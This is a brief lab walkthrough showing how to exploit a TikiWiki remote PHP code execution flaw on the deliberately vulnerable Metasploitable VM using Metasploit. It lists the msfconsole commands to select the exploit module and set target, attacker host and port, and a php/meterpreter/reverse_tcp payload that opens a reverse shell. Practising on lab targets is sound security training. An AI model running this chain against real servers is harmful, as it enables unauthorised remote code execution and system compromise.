Exploiting Tikiwiki using Metasploit Framework

Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql.

You can download the box here.

When scanning the box with Nikto the output reveals the CMS version has a vulnerability that allows remote PHP code execution. We’re going to use Metasploit to run the exploit.

TikiWiki contains a vulnerability which allows remote attackers to execute arbitrary PHP code.

Fire up msfconsole. Let’s see whether it has modules for tikiwiki.

search tikiwiki

Indeed, it does. Quite a few of them.

Set the exploit exploit/unix/webapp/tikiwiki_graph_formula_exec with the command

use index_of_the_module

You can see the payload options with the command options : in order to run the exploit, we have to set the IP of the remote host (Metasploitable 1), the IP of the attacking machine, the listening port and the payload compatible with the specific environment. All these options can be set with the following commands:

set RHOST target_ip_address

set LHOST attacker_ip_address

set LPORT attacker_listening_port

set PAYLOAD php/meterpreter/reverse_tcp (default of this module)

We have a meterpreter shell.